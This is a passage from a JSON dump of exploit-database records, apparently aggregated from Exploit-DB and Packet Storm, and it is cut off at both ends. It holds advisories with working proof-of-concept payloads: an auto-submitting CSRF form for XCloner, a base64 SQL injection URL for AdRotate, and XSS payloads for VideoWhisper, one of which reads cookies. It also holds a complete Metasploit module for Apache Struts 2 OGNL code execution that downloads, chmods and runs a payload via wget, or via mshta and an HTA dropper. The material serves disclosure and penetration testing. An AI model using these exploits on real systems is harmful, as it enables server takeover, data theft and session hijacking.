"2014-04-04T00:00:00", "published": "2014-04-04T00:00:00", "id": "EDB-ID:32701", "href": "https://www.exploit-db.com/exploits/32701/", "type": "exploitdb", "title": "WordPress XCloner Plugin 3.1.0 - CSRF Vulnerability", "sourceData": "Advisory ID: HTB23206\r\nProduct: XCloner Wordpress plugin\r\nVendor: XCloner\r\nVulnerable Version(s): 3.1.0 and probably prior\r\nTested Version: 3.1.0\r\nAdvisory Publication: March 12, 2014 [without technical details]\r\nVendor Notification: March 12, 2014 \r\nVendor Patch: March 13, 2014 \r\nPublic Disclosure: April 2, 2014 \r\nVulnerability Type: Cross-Site Request Forgery [CWE-352]\r\nCVE Reference: CVE-2014-2340\r\nRisk Level: Low \r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered a vulnerability in the XCloner Wordpress plugin, which can be exploited to perform a CSRF attack and gain access to a backed-up copy of the vulnerable website.\r\n\r\n\r\nCross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin: CVE-2014-2340\r\n\r\nThe vulnerability exists due to insufficient verification of the HTTP request origin. A remote attacker can trick a logged-in administrator into visiting a specially crafted webpage and creating a website backup.\r\n\r\nThe simple exploit code below will create a new backup with all website files (no SQL database), which will be publicly accessible at the http://[host]/administrator/backups/backup.tar URL: \r\n\r\n\r\n<form action=\"http://[host]/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=confirm\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"dbbackup\" value=\"1\">\r\n<input type=\"hidden\" name=\"dbbackup_comp\" value=\"\">\r\n<input type=\"hidden\" name=\"bname\" value=\"backup\">\r\n<input type=\"hidden\" name=\"backupComments\" value=\"\">\r\n<input type=\"hidden\" name=\"option\" value=\"com_cloner\">\r\n<input type=\"hidden\" name=\"task\" value=\"generate\">\r\n<input type=\"hidden\" name=\"boxchecked\" value=\"0\">\r\n<input type=\"hidden\" name=\"hidemainmenu\" value=\"0\">\r\n<input type=\"hidden\" name=\"\" value=\"\">\r\n<input type=\"submit\" name=\"run\" value=\"run\">\r\n</form>\r\n<script>\r\ndocument.main.submit();\r\n</script>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to XCloner 3.1.1\r\n\r\nMore Information:\r\nhttp://www.xcloner.com/support/download/?did=9\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech 
Bridge Advisory HTB23206 - https://www.htbridge.com/advisory/HTB23206 - Cross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin.\r\n[2] XCloner Wordpress plugin - http://www.xcloner.com - XCloner is a professional website Backup and Restore application designed to allow you to create safe complete backups of any PHP/Mysql website and to be able to restore them anywhere. It works as a native Joomla backup component, as a native Wordpress backup plugin and also as standalone PHP/Mysql backup application.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/32701/"}, {"lastseen": "2016-02-03T15:35:47", "bulletinFamily": "exploit", "description": "Wordpress AdRotate Plugin 3.9.4 - (clicktracker.php track param) SQL Injection. CVE-2014-1854. 
Webapps exploit for php platform", "modified": "2014-02-22T00:00:00", "published": "2014-02-22T00:00:00", "id": "EDB-ID:31834", "href": "https://www.exploit-db.com/exploits/31834/", "type": "exploitdb", "title": "WordPress AdRotate Plugin 3.9.4 - clicktracker.php track param SQL Injection", "sourceData": "Advisory ID: HTB23201\r\nProduct: AdRotate\r\nVendor: AJdG Solutions\r\nVulnerable Version(s): 3.9.4 and probably prior\r\nTested Version: 3.9.4\r\nAdvisory Publication: January 30, 2014 [without technical details]\r\nVendor Notification: January 30, 2014 \r\nVendor Patch: January 31, 2014 \r\nPublic Disclosure: February 20, 2014 \r\nVulnerability Type: SQL Injection [CWE-89]\r\nCVE Reference: CVE-2014-1854\r\nRisk Level: High \r\nCVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered a vulnerability in AdRotate, which can be exploited to perform SQL Injection attacks.\r\n\r\n\r\n1) SQL Injection in AdRotate: CVE-2014-1854\r\n\r\nThe vulnerability exists due to insufficient validation of the \"track\" HTTP GET parameter passed to the \"/wp-content/plugins/adrotate/library/clicktracker.php\" script. 
A remote unauthenticated attacker can execute arbitrary SQL commands in the application's database.\r\n\r\nThe following PoC code contains the base64-encoded string \"-1 UNION SELECT version(),1,1,1\", which will be injected into the SQL query and will output the MySQL server version:\r\n\r\nhttp://[host]/wp-content/plugins/adrotate/library/clicktracker.php?track=LTEgVU5JT04gU0VMRUNUIHZlcnNpb24oKSwxLDEsMQ==\r\n\r\nSuccessful exploitation will result in a redirection to a local URI that contains the version of the MySQL server:\r\nhttp://[host]/wp-content/plugins/adrotate/library/5.1.71-community-log\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to AdRotate 3.9.5\r\n\r\nMore Information:\r\nhttp://www.adrotateplugin.com/2014/01/adrotate-pro-3-9-6-and-adrotate-free-3-9-5/\r\nhttp://wordpress.org/plugins/adrotate/changelog/\r\nhttp://www.adrotateplugin.com/development/\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23201 - https://www.htbridge.com/advisory/HTB23201 - SQL Injection in AdRotate.\r\n[2] AdRotate - http://wordpress.org/plugins/adrotate/ - AdRotate for WordPress.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability 
testing.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/31834/"}, {"lastseen": "2016-02-03T05:11:59", "bulletinFamily": "exploit", "description": "Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution. CVE-2013-2251. Remote exploits for multiple platform", "modified": "2013-07-27T00:00:00", "published": "2013-07-27T00:00:00", "id": "EDB-ID:27135", "href": "https://www.exploit-db.com/exploits/27135/", "type": "exploitdb", "title": "Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::HttpServer\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution',\r\n 'Description' => %q{\r\n The Struts 2 DefaultActionMapper supports a method for short-circuit navigation\r\n state changes by prefixing parameters with \"action:\" or \"redirect:\", followed by\r\n a desired navigational target expression. 
This mechanism was intended to help with\r\n attaching navigational information to buttons within forms.\r\n\r\n In Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\" or\r\n \"redirectAction:\" is not properly sanitized. Since said information will be\r\n evaluated as OGNL expression against the value stack, this introduces the\r\n possibility to inject server side code.\r\n\r\n This module has been tested successfully on Struts 2.3.15 over Tomcat 7, with\r\n Windows 2003 SP2 and Ubuntu 10.04 operating systems.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Takeshi Terada', # Vulnerability discovery\r\n 'sinn3r', # Metasploit module\r\n 'juan vazquez' # Metasploit modules\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-2251' ],\r\n [ 'OSVDB', '95405' ],\r\n [ 'BID', '61189' ],\r\n [ 'URL', 'http://struts.apache.org/release/2.3.x/docs/s2-016.html' ]\r\n ],\r\n 'Platform' => [ 'win', 'linux'],\r\n 'Targets' =>\r\n [\r\n ['Automatic', {}],\r\n ['Windows',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n ['Linux',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux'\r\n }\r\n ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'WfsDelay' => 10\r\n },\r\n 'Stance' => Msf::Exploit::Stance::Aggressive,\r\n 'DisclosureDate' => 'Jul 2 2013',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [true, 'Action URI', '/struts2-blank/example/HelloWorld.action']),\r\n OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 60]),\r\n # It isn't OptPath because it's a *remote* path\r\n OptString.new(\"WritableDir\", [ true, \"A directory where we can write files (only on Linux targets)\", \"/tmp\" ])\r\n ], self.class)\r\n end\r\n\r\n def on_new_session(session)\r\n if session.type == \"meterpreter\"\r\n session.core.use(\"stdapi\") unless session.ext.aliases.include?(\"stdapi\")\r\n end\r\n\r\n @dropped_files.delete_if 
do |file|\r\n # only the Windows .exe is handled here; anything else is left in the list\r\n # for FileDropper's generic cleanup (super below)\r\n next false unless file =~ /\\.exe/\r\n win_file = file.gsub(\"/\", \"\\\\\\\\\")\r\n if session.type == \"meterpreter\"\r\n begin\r\n wintemp = session.fs.file.expand_path(\"%TEMP%\")\r\n win_file = \"#{wintemp}\\\\#{win_file}\"\r\n session.shell_command_token(%Q|attrib.exe -r \"#{win_file}\"|)\r\n session.fs.file.rm(win_file)\r\n print_good(\"Deleted #{file}\")\r\n true\r\n rescue ::Rex::Post::Meterpreter::RequestError\r\n print_error(\"Failed to delete #{win_file}\")\r\n false\r\n end\r\n end\r\n end\r\n\r\n super\r\n end\r\n\r\n def start_http_service\r\n # do not use SSL\r\n if datastore['SSL']\r\n ssl_restore = true\r\n datastore['SSL'] = false\r\n end\r\n\r\n if (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\")\r\n srv_host = Rex::Socket.source_address(rhost)\r\n else\r\n srv_host = datastore['SRVHOST']\r\n end\r\n\r\n service_url = srv_host + ':' + datastore['SRVPORT'].to_s\r\n print_status(\"#{rhost}:#{rport} - Starting up our web service on #{service_url} ...\")\r\n start_service({\r\n 'Uri' => {\r\n 'Proc' => Proc.new { |cli, req|\r\n on_request_uri(cli, req)\r\n },\r\n 'Path' => '/'\r\n }\r\n })\r\n\r\n datastore['SSL'] = true if ssl_restore\r\n\r\n return service_url\r\n end\r\n\r\n def check\r\n uri = normalize_uri(target_uri.path)\r\n res = send_request_cgi({\r\n 'uri' => uri,\r\n 'method' => 'GET'\r\n })\r\n\r\n if res.nil? 
or res.code != 200\r\n print_error(\"#{rhost}:#{rport} - Check needs a valid action, returning 200, as TARGETURI\")\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n proof = rand_text_alpha(6 + rand(4))\r\n\r\n res = send_request_cgi({\r\n 'uri' => \"#{uri}?redirect:%25{new%20java.lang.String('#{proof}')}\",\r\n 'method' => 'GET'\r\n })\r\n\r\n if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n def auto_target\r\n uri = normalize_uri(target_uri.path)\r\n res = send_request_cgi({\r\n 'uri' => uri,\r\n 'method' => 'GET'\r\n })\r\n\r\n if res.nil? or res.code != 200\r\n fail_with(Exploit::Failure::NoTarget, \"#{rhost}:#{rport} - In order to autodetect, a valid action, returning 200, must be provided as TARGETURI\")\r\n end\r\n\r\n proof = rand_text_alpha(6 + rand(4))\r\n\r\n res = send_request_cgi({\r\n 'uri' => \"#{uri}?redirect:%25{new%20java.io.File('.').getCanonicalPath().concat('#{proof}')}\",\r\n 'method' => 'GET'\r\n })\r\n\r\n if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/\r\n if res.headers['Location'] =~ /:\\\\/\r\n return targets[1] # Windows\r\n else\r\n return targets[2] # Linux\r\n end\r\n end\r\n\r\n fail_with(Exploit::Failure::NoTarget, \"#{rhost}:#{rport} - Target auto-detection didn't work\")\r\n\r\n end\r\n\r\n def exploit_linux\r\n\r\n downfile = rand_text_alpha(8+rand(8))\r\n @pl = @exe\r\n @pl_sent = false\r\n\r\n #\r\n # start HTTP service if necessary\r\n #\r\n service_url = start_http_service\r\n\r\n #\r\n # download payload\r\n #\r\n fname = datastore['WritableDir']\r\n fname = \"#{fname}/\" unless fname =~ %r'/$'\r\n fname << downfile\r\n uri = normalize_uri(target_uri.path)\r\n uri << 
\"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'wget','#{service_url}','-O',new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f')})).start()}\"\r\n\r\n print_status(\"#{rhost}:#{rport} - Downloading payload to #{fname}...\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n })\r\n\r\n if res.nil? or res.code != 302\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\r\n end\r\n\r\n #\r\n # wait for payload download\r\n #\r\n wait_payload\r\n\r\n register_file_for_cleanup(fname)\r\n\r\n #\r\n # chmod\r\n #\r\n uri = normalize_uri(target_uri.path)\r\n uri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'chmod','777',new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f')})).start()}\"\r\n\r\n print_status(\"#{rhost}:#{rport} - Make payload executable...\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n })\r\n\r\n if res.nil? or res.code != 302\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\r\n end\r\n\r\n #\r\n # execute\r\n #\r\n uri = normalize_uri(target_uri.path)\r\n uri << \"?redirect:%25{(new%20java.lang.ProcessBuilder(new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f'))).start()}\"\r\n\r\n print_status(\"#{rhost}:#{rport} - Execute payload...\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n })\r\n\r\n if res.nil? 
or res.code != 302\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\r\n end\r\n\r\n end\r\n\r\n def exploit_windows\r\n @var_exename = rand_text_alpha(4 + rand(4)) + '.exe'\r\n @pl = build_hta\r\n @pl_sent = false\r\n\r\n #\r\n # start HTTP service if necessary\r\n #\r\n service_url = start_http_service\r\n\r\n #\r\n # execute hta\r\n #\r\n uri = normalize_uri(target_uri.path)\r\n uri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'mshta',new%20java.lang.String('http:nn#{service_url}').replace('n','\\\\u002f')})).start()}\"\r\n\r\n print_status(\"#{rhost}:#{rport} - Execute payload through malicious HTA...\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n })\r\n\r\n if res.nil? or res.code != 302\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\r\n end\r\n\r\n #\r\n # wait for payload download\r\n #\r\n wait_payload\r\n\r\n register_file_for_cleanup(@var_exename)\r\n end\r\n\r\n def exploit\r\n if target.name =~ /Automatic/\r\n print_status(\"#{rhost}:#{rport} - Target autodetection...\")\r\n my_target = auto_target\r\n print_good(\"#{rhost}:#{rport} - #{my_target.name} target found!\")\r\n else\r\n my_target = target\r\n end\r\n\r\n p = exploit_regenerate_payload(my_target.platform, my_target.arch)\r\n @exe = generate_payload_exe({:code => p.encoded, :platform => my_target.platform, :arch => my_target.arch})\r\n\r\n if my_target.name =~ /Linux/\r\n if datastore['PAYLOAD'] =~ /windows/\r\n fail_with(Exploit::Failure::BadConfig, \"#{rhost}:#{rport} - The target is Linux, but you've selected a Windows payload!\")\r\n end\r\n exploit_linux\r\n elsif my_target.name =~ /Windows/\r\n if datastore['PAYLOAD'] =~ /linux/\r\n fail_with(Exploit::Failure::BadConfig, \"#{rhost}:#{rport} - The target is Windows, but you've selected a Linux payload!\")\r\n end\r\n exploit_windows\r\n end\r\n end\r\n\r\n # Handle incoming requests from the server\r\n 
def on_request_uri(cli, request)\r\n vprint_status(\"#{rhost}:#{rport} - URI requested: #{request.inspect}\")\r\n if (not @pl)\r\n print_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\")\r\n return\r\n end\r\n print_status(\"#{rhost}:#{rport} - Sending the payload to the server...\")\r\n @pl_sent = true\r\n send_response(cli, @pl)\r\n end\r\n\r\n # wait for the data to be sent (used by both the Linux ELF and the Windows HTA path)\r\n def wait_payload\r\n print_status(\"#{rhost}:#{rport} - Waiting for the victim to request the payload...\")\r\n\r\n waited = 0\r\n while (not @pl_sent)\r\n select(nil, nil, nil, 1)\r\n waited += 1\r\n if (waited > datastore['HTTP_DELAY'])\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Target didn't request the payload -- maybe it can't connect back to us?\")\r\n end\r\n end\r\n end\r\n\r\n def build_hta\r\n var_shellobj = rand_text_alpha(rand(5)+5);\r\n var_fsobj = rand_text_alpha(rand(5)+5);\r\n var_fsobj_file = rand_text_alpha(rand(5)+5);\r\n var_vbsname = rand_text_alpha(rand(5)+5);\r\n var_writedir = rand_text_alpha(rand(5)+5);\r\n\r\n var_origLoc = rand_text_alpha(rand(5)+5);\r\n var_byteArray = rand_text_alpha(rand(5)+5);\r\n var_writestream = rand_text_alpha(rand(5)+5);\r\n var_strmConv = rand_text_alpha(rand(5)+5);\r\n\r\n # Doing in this way to bypass the ADODB.Stream restrictions on JS,\r\n # even when executing it as an \"HTA\" application\r\n # The encoding code has been stolen from ie_unsafe_scripting.rb\r\n print_status(\"#{rhost}:#{rport} - Encoding payload into vbs/javascript/hta...\");\r\n\r\n # Build the content that will end up in the .vbs file\r\n vbs_content = Rex::Text.to_hex(%Q|\r\nDim #{var_origLoc}, s, #{var_byteArray}\r\n#{var_origLoc} = SetLocale(1033)\r\n|)\r\n # Drop the exe payload into an ansi string (ansi ensured via SetLocale above)\r\n # for conversion with ADODB.Stream\r\n vbs_ary = []\r\n # The output of this loop needs to be as small as possible since it\r\n # gets repeated for every byte of 
the executable, ballooning it by a\r\n # factor of about 80k (the current size of the exe template). In its\r\n # current form, it's down to about 4MB on the wire\r\n @exe.each_byte do |b|\r\n vbs_ary << Rex::Text.to_hex(\"s=s&Chr(#{(\"%d\" % b)})\\n\")\r\n end\r\n vbs_content << vbs_ary.join(\"\")\r\n\r\n # Continue with the rest of the vbs file;\r\n # Use ADODB.Stream to convert from an ansi string to its byteArray equivalent\r\n # Then use ADODB.Stream again to write the binary to file.\r\n #print_status(\"Finishing vbs...\");\r\n vbs_content << Rex::Text.to_hex(%Q|\r\nDim #{var_strmConv}, #{var_writedir}, #{var_writestream}\r\n#{var_writedir} = WScript.CreateObject(\"WScript.Shell\").ExpandEnvironmentStrings(\"%TEMP%\") & \"\\\\#{@var_exename}\"\r\n\r\nSet #{var_strmConv} = CreateObject(\"ADODB.Stream\")\r\n\r\n#{var_strmConv}.Type = 2\r\n#{var_strmConv}.Charset = \"x-ansi\"\r\n#{var_strmConv}.Open\r\n#{var_strmConv}.WriteText s, 0\r\n#{var_strmConv}.Position = 0\r\n#{var_strmConv}.Type = 1\r\n#{var_strmConv}.SaveToFile #{var_writedir}, 2\r\n\r\nSetLocale(#{var_origLoc})|)\r\n\r\n hta = <<-EOS\r\n <script>\r\n var #{var_shellobj} = new ActiveXObject(\"WScript.Shell\");\r\n var #{var_fsobj} = new ActiveXObject(\"Scripting.FileSystemObject\");\r\n var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings(\"%TEMP%\");\r\n var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\",2,true);\r\n\r\n #{var_fsobj_file}.Write(unescape(\"#{vbs_content}\"));\r\n #{var_fsobj_file}.Close();\r\n\r\n #{var_shellobj}.run(\"wscript.exe \" + #{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\", 1, true);\r\n #{var_shellobj}.run(#{var_writedir} + \"\\\\\\\\\" + \"#{@var_exename}\", 0, false);\r\n #{var_fsobj}.DeleteFile(#{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\");\r\n window.close();\r\n </script>\r\n EOS\r\n\r\n return hta\r\n end\r\n\r\n\r\nend", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/27135/"}], "packetstorm": [{"lastseen": "2016-12-05T22:24:07", "bulletinFamily": "exploit", "description": "", "modified": "2014-02-27T00:00:00", "published": "2014-02-27T00:00:00", "href": "https://packetstormsecurity.com/files/125454/VideoWhisper-Live-Streaming-Integration-4.27.3-XSS-Shell-Upload-Traversal.html", "id": "PACKETSTORM:125454", "type": "packetstorm", "title": "VideoWhisper Live Streaming Integration 4.27.3 XSS / Shell Upload / Traversal", "sourceData": "`Advisory ID: HTB23199 \nProduct: VideoWhisper Live Streaming Integration \nVendor: VideoWhisper \nVulnerable Version(s): 4.27.3 and probably prior \nTested Version: 4.27.3 \nAdvisory Publication: February 6, 2014 [without technical details] \nVendor Notification: February 6, 2014 \nVendor Patch: February 7, 2014 \nPublic Disclosure: February 27, 2014 \nVulnerability Type: Unrestricted Upload of File with Dangerous Type [CWE-434], Cross-Site Scripting [CWE-79], Path Traversal [CWE-22], Information Exposure Through Externally-Generated Error Message [CWE-211] \nCVE References: CVE-2014-1905, CVE-2014-1906, CVE-2014-1907, CVE-2014-1908 \nRisk Level: Critical \nCVSSv2 Base Scores: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in VideoWhisper Live Streaming Integration, which can be exploited to execute arbitrary code on the target system, gain access to potentially sensitive data, perform Cross-Site Scripting (XSS) attacks against users of vulnerable application and 
delete arbitrary files. \n \n \n1) Arbitrary File Upload in VideoWhisper Live Streaming Integration: CVE-2014-1905 \n \nVideoWhisper Live Streaming Integration does not properly verify file extensions before uploading files to the server in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vw_snapshots.php\". A remote attacker can upload and execute an arbitrary PHP file on the target system. \n \nThe following PoC code demonstrates exploitation of the vulnerability: \n \nAfter successful exploitation the remote shell will be accessible via the following URL: \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/snapshots/1.php.jpg \n \nSuccessful exploitation of this vulnerability requires that the webserver is not configured to handle the mime-type for media files with the .jpg extension. \n \n \n2) Cross-Site Scripting (XSS) in VideoWhisper Live Streaming Integration: CVE-2014-1906 \n \n2.1 The vulnerability exists due to insufficient filtration of the \"m\" HTTP POST parameter in the \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php\" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary HTML and script code in the browser in the context of the vulnerable website when a user visits a page with the plugin\u2019s widget enabled. 
The script will also be executed in the administrative section on the following page: \n \nhttp://[host]/wp-admin/options-general.php?page=videowhisper_streaming.php&tab=live \n \nThe exploitation examples below use the \"alert()\" JavaScript function to display the word \"immuniweb\": \n \n<body onLoad=\"document.hack.submit()\"> \n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php\" method=\"post\"> \n<input type=\"hidden\" name=\"s\" value=\"1\"> \n<input type=\"hidden\" name=\"u\" value=\"1\"> \n<input type=\"hidden\" name=\"r\" value=\"1\"> \n<input type=\"hidden\" name=\"m\" value=\"<script>alert('immuniweb')</script>\"> \n</form> \n</body> \n \n2.2 The vulnerability exists due to insufficient filtration of the \"msg\" HTTP POST parameter in the \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vc_chatlog.php\" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary HTML and script code in the browser in the context of the vulnerable website when a user visits the affected page. \n \nThe exploitation examples below use the \"alert()\" JavaScript function to display the word \"immuniweb\": \n \n<body onLoad=\"document.hack.submit()\"> \n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/vc_chatlog.php\" method=\"post\"> \n<input type=\"hidden\" name=\"msg\" value=\"<script>alert('immuniweb')</script>\"> \n<input type=\"hidden\" name=\"r\" value=\"1\"> \n</form> \n</body> \n \nThe code will be executed when the user visits the following URL: \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/uploads/[room]/Log[date].html \n \nwhere [room] is set by the HTTP POST parameter r and [date] is the current date. 
\n \n2.3 The vulnerabilities exist due to insufficient filtration of the \"n\" HTTP GET parameter passed to the scripts \"channel.php\", \"htmlchat.php\", \"video.php\" and \"videotext.php\" within the \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/\" directory. A remote attacker can send a specially crafted HTTP GET request to the vulnerable scripts and execute arbitrary HTML and script code in the browser in the context of the vulnerable website. \n \nThe exploitation examples below use the \"alert()\" JavaScript function to display the word \"immuniweb\": \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/channel.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/htmlchat.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/video.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/videotext.php?n=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \n \n2.4 The vulnerability exists due to insufficient filtration of the \"message\" HTTP GET parameter passed to the \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logout.php\" script. A remote attacker can trick a user into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display the word \"immuniweb\": \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logout.php?message=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E \n \n2.5 The vulnerability exists due to insufficient filtration of the \"ct\" HTTP POST parameter passed to the \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php\" script. 
